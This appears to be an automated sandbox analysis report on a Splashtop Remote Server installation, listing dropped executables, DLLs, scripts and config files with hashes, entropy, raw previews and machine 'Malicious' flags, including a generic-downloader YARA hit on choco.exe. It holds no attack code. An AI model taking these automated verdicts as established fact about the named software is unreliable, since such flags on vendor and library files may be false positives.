                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe /r remove @HID\sthid* >> inst.log..utils\devcon64.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd64.exe /u sthid.inf >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\DIFxCmd.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jp.....V...V...V.ivV...V.igV...V.iaV...V...V&..V.iqV...V.icV...VRich...V........PE..L....zZP.............................#.......0...............................P............@...... ..........................d(..P............................@..l.......................................@............................................text............................... ..`.data...x....0......."..............@....reloc.......@.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\DIFxCmd64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................................................Rich....................PE..d....vZP.........."...... ..........(%.......................................`.......`....@.......... ......................................4+..P............@...............P......p...................................................8............................text............ .................. ..`.data........0.......$..............@....pdata.......@.......&..............@..@.reloc..8....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\StHidNotSupport.reg

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.654691319611147
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Qyk+SkWCiiCRroZ6IJlUAG+DZeMV4GGMVQIwchhyR12qv:Qy5hVZteAxDZBuGp/hUp
                                                                                                                                                                                                                                                                                                                                  MD5:AFB11B8A638A36856B635F9805BEC627
                                                                                                                                                                                                                                                                                                                                  SHA1:29E88479691D922698D1DAEC3F06EFD438CB90F1
                                                                                                                                                                                                                                                                                                                                  SHA-256:908EF8C0EEE73EFFAE7CA6AAEF29387302B1D69AEBE5EA587DEE7F1589F418D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:1C929F635DF273BF7843A433C461761374E3CE8B2A41C479E2AA9B6A27F4CEF5CE78BAE8902EE99673E33E9E165333A1A4C09D8503F259809F282E6B4A15EBA9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.O.F.T.W.A.R.E.\.S.p.l.a.s.h.t.o.p. .I.n.c...\.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r.].....".S.t.H.i.d.S.u.p.p.o.r.t.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.0.........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\StHidSupport.reg

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6709758888329973
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Qyk+SkWCiiCRroZ6IJlUAG+DZeMV4GGMVQIwchhyR12q8:Qy5hVZteAxDZBuGp/hU2
                                                                                                                                                                                                                                                                                                                                  MD5:4F4EC6847BC91FCFAC8BFE7840649CCE
                                                                                                                                                                                                                                                                                                                                  SHA1:642FB6860473391D28E1DC407A81B3829D048AFC
                                                                                                                                                                                                                                                                                                                                  SHA-256:CC4837A65AE43EDF3AA3FD2C77912A881694C43EE203A127CE27641455AC7AD3
                                                                                                                                                                                                                                                                                                                                  SHA-512:C896A60395237BED708C79CDBFF2FE9685E8B42A140EF96C2352559128B7700DFF8CA7267261A9EB5143583F296D0498C811E092516408B5500CC75DA8409C44
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.O.F.T.W.A.R.E.\.S.p.l.a.s.h.t.o.p. .I.n.c...\.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r.].....".S.t.H.i.d.S.u.p.p.o.r.t.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.1.........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P............@...... ..........................lm..........p....................@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......|.....@.......... ......................................X}..........p.......T............`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\WBAppVidRec.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):207368
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.3782613062901925
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:aGvbxQU5Xxmg25YBu/QJWxAk0XbTqS9MC4bNzLT0pnn:PX80ZJF9wbNzLT0pn
                                                                                                                                                                                                                                                                                                                                  MD5:8020E8DA29CD91902771E1DC822BC4FC
                                                                                                                                                                                                                                                                                                                                  SHA1:9E2AEC7DAA4BA0C1D9B959CB9BA1915E819D7E2C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E01A438780F09A281FB189C42CF3BC33BC1D2DF662015A9DE671A51A8D2FC82
                                                                                                                                                                                                                                                                                                                                  SHA-512:B12BC3C21A14318E980B4F91E070A99307D8F91EC24EEB4461E823CE1900ECB5F24C379C493674F82D9F69A4B09DEFC73D5A8DEB0C3FF6943FFBEDEAFA703A5E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Ek[j..59..59..59.x68..59.x08..59&.H9..59..59$.59..j9..59.r.9..59..18..59..68..59..081.59.x18..59.x48..59..49..59o.<8..59o..9..59...9..59o.78..59Rich..59........PE..L......f...............&.....t....................@..........................@............@..........................................P..p................(... ..P.......p...............................@............................................text............................... ..`.rdata...{.......|..................@..@.data...P....0......................@....rsrc...p....P.......$..............@..@.reloc..P.... ......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\amf-vcedem-win32.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):198608
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.465406905232138
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:mNvlfI7fn3+ksrtRYs5BZdHEsTznNZQtiF22W9bKReKn:+fMnuhrrYszTjTQtiF22WKl
                                                                                                                                                                                                                                                                                                                                  MD5:B51CB7BD99774F42D4FCD81522E159DA
                                                                                                                                                                                                                                                                                                                                  SHA1:815646C93E09F0DB23951F3D8CD7319240CDBD43
                                                                                                                                                                                                                                                                                                                                  SHA-256:55C8BEEBC29238A691AF1FDF44D922BDAC9B47034956311A9D467374049462C2
                                                                                                                                                                                                                                                                                                                                  SHA-512:3375489BC03A442775FB02C5AB1D264FF2A972A805179B9F860D1FF26F09E529DCF7D03EA18CF3D56FC1DD429423C344CBFC4B89F20158D84896AA257240796A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f.............+......(......-......).......`...p_....>......?.5....?.,....?./....?.*....Rich...........PE..L......R...........!......... ......!........................................0......m8....@.........................pa..o9..8R..P................................"......8...............................@...............h............................text...F........................... ..`.rdata.............................@..@.data....8.......4..................@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\avutil-55.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):561584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5335413043485335
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:n+Uac7b2syTCmCZ9z7I6KxOYDkHlTiO+k86hiCivi:+UacGbC7bYgHlTi6eo
                                                                                                                                                                                                                                                                                                                                  MD5:A9A9D31764B50858A01B1FB228406F06
                                                                                                                                                                                                                                                                                                                                  SHA1:7A313C46F049287045992F54F9D6EDA9DB568EF8
                                                                                                                                                                                                                                                                                                                                  SHA-256:C0BABD7670124BB298D3BA6A8EE5AE33AD1030C08A18D8B8861F5D83003EB645
                                                                                                                                                                                                                                                                                                                                  SHA-512:164D5497AA91A5B4742A291F589400BC0B189AF946615A2F04E6CFD1ED598A542F7521E4DD79AAB99414846A3C391255309F911C247EF446A0483D9FAB6EFDFC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................h......._(`........................................V....V......V......Rich....................PE..L...9..X.........."!.....X...h......-T.......p......................................}/....@.............................`6...D..P....................z..................................................@............p...............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data...TT...P.......<..............@....gfids...............H..............@..@.reloc...........0...J..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\choco.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11479560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.352121129517374
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:QFLqnywIMoJDvZ4drfgYOfyg74bvnFCw4UnH:QFLqywhoJDadbk6HFUUH
                                                                                                                                                                                                                                                                                                                                  MD5:2EA6D3B8DEF550387EF986976A2C7302
                                                                                                                                                                                                                                                                                                                                  SHA1:7A0471A88819941FAA90C017593DE695FFE2CEB1
                                                                                                                                                                                                                                                                                                                                  SHA-256:D024B79B5B6DF6AC65A10A3E3D88266D4FBA17F5E1CDB9F9A4C0E276499741B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:545BD9203B3A1D762C29755DA4021565C85DFF12A49992BE98A17BB9A6C342CAD955A5CF1C4D572B654BE70CDC40F12B0C6BEE221ED23CB31EE311670EEE12E6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\choco.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y.f.................4...........R... ...`....@.. .......................`...........`..................................Q..L....`..w................(...@......0R..............................................(R............... ..H............text....2... ...4.................. ..`.rsrc...w....`.......6..............@..@.reloc.......@......................@..B................H.........[.*lQ..........(..c3.\.(......................................0<.I.......s.u.....}.'....}.'..s.u...(....~u.....(....:.....(....&.......%.......(@....(a...(....(.....(....}.'..(.....r...p(:...~.'..%:....&~.'.....u..s....%..'..oT.....o...+}.'...o...+...s....}.'...{.'..o....9#....(....:.....{.'...o.....{.'...o......{.'....{.'......u..s....(.....{.'..o....95....{.'..o....9%....{.'..o....:.....{.'..oB...:....(.....{.'..o|...o....9$...r...p.y..........%.......(@....(a....{.'..oH

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\dbghelp.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1077592
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.435239338734592
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:n7PeeMxAg8KA6EhyC/H488sCGF8MBo9Bi8sROlu4VWKl6sEPdf8/2RYv:cxNEhyC/H488sLqMDIlu4Nl6suK2Re
                                                                                                                                                                                                                                                                                                                                  MD5:EEDA10135EDE6EDB5C85DF3BD878E557
                                                                                                                                                                                                                                                                                                                                  SHA1:8A1059DFD641269945E7A2710B684881BB63E8D2
                                                                                                                                                                                                                                                                                                                                  SHA-256:4B890DE3708716D81C1C719B498734339D417E8FFC4955D81483D1EBC0F84697
                                                                                                                                                                                                                                                                                                                                  SHA-512:A56BFC73537E36EFBA8E09FFD0B2F6BFC56BC4CB4FE90B52858C7AFD5D67DB23CCBA51C8097BEFE4ECB5082BA66C2B2612E2975EF3448252C48B97F41D12D591
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^1...P...P...P..!z=..P..!z<..P.......P...P...P.......P.......P......!P......qP..=...<P.......P.......P..Rich.P..........................PE..L...8d#I...........!.....>..........a........P...........................................@..........................6..c....)..<.... ...............V..X....0..........................................@....................)..`....................text...s<.......>.................. ..`.data...d....P...H...B..............@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\fips.cnf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):592
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.220610311013542
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:oOtKAD4cL4jVpfWBzX2TShiucyfQ3W+/07T1raW1ijTofkVge1O0lgxErqM6n:ocKVg30ucSw07TNa97VgQ6erJ6
                                                                                                                                                                                                                                                                                                                                  MD5:E077993E994D28BBC7502681280C5551
                                                                                                                                                                                                                                                                                                                                  SHA1:9C3B360F9E81CCF8C8B56BE25E4CE9D67D1F61B4
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8D539255FB1EA42EE3B06F0E314B037E35701E2B258272889D866DD3419526B
                                                                                                                                                                                                                                                                                                                                  SHA-512:B2FED3539BD94999F9F9A2CFEBAC6A3632212C10F3D97A5129E444FC548D1685877D0810790B71D342A4EF9080D1EFC73BF7A9493B5CCBD93232231EE2251ABE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:config_diagnostics = 1..openssl_conf = openssl_init....[openssl_init]..providers = provider_sect....[provider_sect]..fips = fips_sect..base = base_sect....[fips_sect]..activate = 1..install-version = 1..conditional-errors = 1..security-checks = 1..module-mac = 73:FF:87:A3:02:5E:E0:EE:AC:F3:E0:B1:9C:93:CB:FD:3D:05:93:39:98:A8:41:A4:EA:76:82:17:3B:38:E8:86..install-mac = 41:9C:38:C2:8F:59:09:43:2C:AA:2F:58:36:2D:D9:04:F9:6C:56:8B:09:E0:18:3A:2E:D6:CC:69:05:04:E1:11..install-status = INSTALL_SELF_TEST_KATS_RUN....[base_sect]..activate = 1....[algorithm_sect]..default_properties = fips=yes

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\fips.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):697352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.893951271183897
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:OB44g9qIIyg5RJbw/L5zQZVaOwZdTGJ5zk1m5GFsXvHOg9wlU7:OB44lIIygZb8L5zQyXZRdi2apwlU7
                                                                                                                                                                                                                                                                                                                                  MD5:68D8D459EE6A5027FFE35302B21D66FA
                                                                                                                                                                                                                                                                                                                                  SHA1:91299E1FF75B293A18105FBDFCB2CDE92A6C8507
                                                                                                                                                                                                                                                                                                                                  SHA-256:0EF5739FCC3850411E1DB6AF2E194E25C7E473BB950A387A7C851FE02660B4E8
                                                                                                                                                                                                                                                                                                                                  SHA-512:C032E6C057DA58374FF51B50B2146E4B27EB6A18A452668EB2C78E3F4E729399F303873A2DC40F5910826A4F23146DFB851B62DF3D5948A9039EC6ED23E53B32
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........3...`...`...`..a...`..a...`..a...`...a...`...a...`...a...`..a...`...`..`...`...`...a...`...a...`..j`...`...a...`Rich...`........................PE..L...K..e...........!...&.....................0...............................@....... ....@..........................4..P....3.......0...............|...(...4......................................................................................UPX0....................................UPX1.............r..................@....rsrc........0.......v..............@......................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\legacy.cnf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.40567624896974
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:ekfDaZOtK1FA1Jn4R7mvLvn4RYVXKCw/AFLr+TmNfOmZyJn:xiOtKADn4NmvDn42oCQG3+TJn
                                                                                                                                                                                                                                                                                                                                  MD5:A43B7D72B482D48804B377D8832C2693
                                                                                                                                                                                                                                                                                                                                  SHA1:B1598EFDA8E9863F520ABEF9AAA942C313C002FD
                                                                                                                                                                                                                                                                                                                                  SHA-256:9ACDE3809E2C02FE5D6C59153AEFFFE6628996EC5CFB7C2385865DCD1EC8BE7E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F0777A8F79E70F8A12F531C3E77F5241E9ED46ACC6A1CBF06FF7A29D91EE281E4CD2A9C1832642992FE74D33B052670F85439E5925FDB7C44DE60014E53712DA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:config_diagnostics = 1..openssl_conf = openssl_init....[openssl_init]..providers = provider_sect....[provider_sect]..legacy = legacy_sect....[legacy_sect]..activate = 1

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\legacy.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):160776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.897311739545073
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:M2uLSdBwPPvzj+2a7wQptIkcIWqmHT+BBI/gM6Z+a:Xum0PSwQptIXIWqyH4MO
                                                                                                                                                                                                                                                                                                                                  MD5:CF52DBEFBE8BC2DCD493CDBF050048E1
                                                                                                                                                                                                                                                                                                                                  SHA1:AED132B049C77FD77645D07B443E1B4E96CB5E51
                                                                                                                                                                                                                                                                                                                                  SHA-256:8080E398EDC43E652C0A104F62AD3C865E9BDC75C2E3936870DEAF43FEDBC3A4
                                                                                                                                                                                                                                                                                                                                  SHA-512:75133444A893002B9933EB3A44B66CD862FEDC9C05579B188EB250BBC3CC00C61533FB3AA58A1D9B89B45F83CFF8A3B02CB0FB605B299E0E7BACE13B99020207
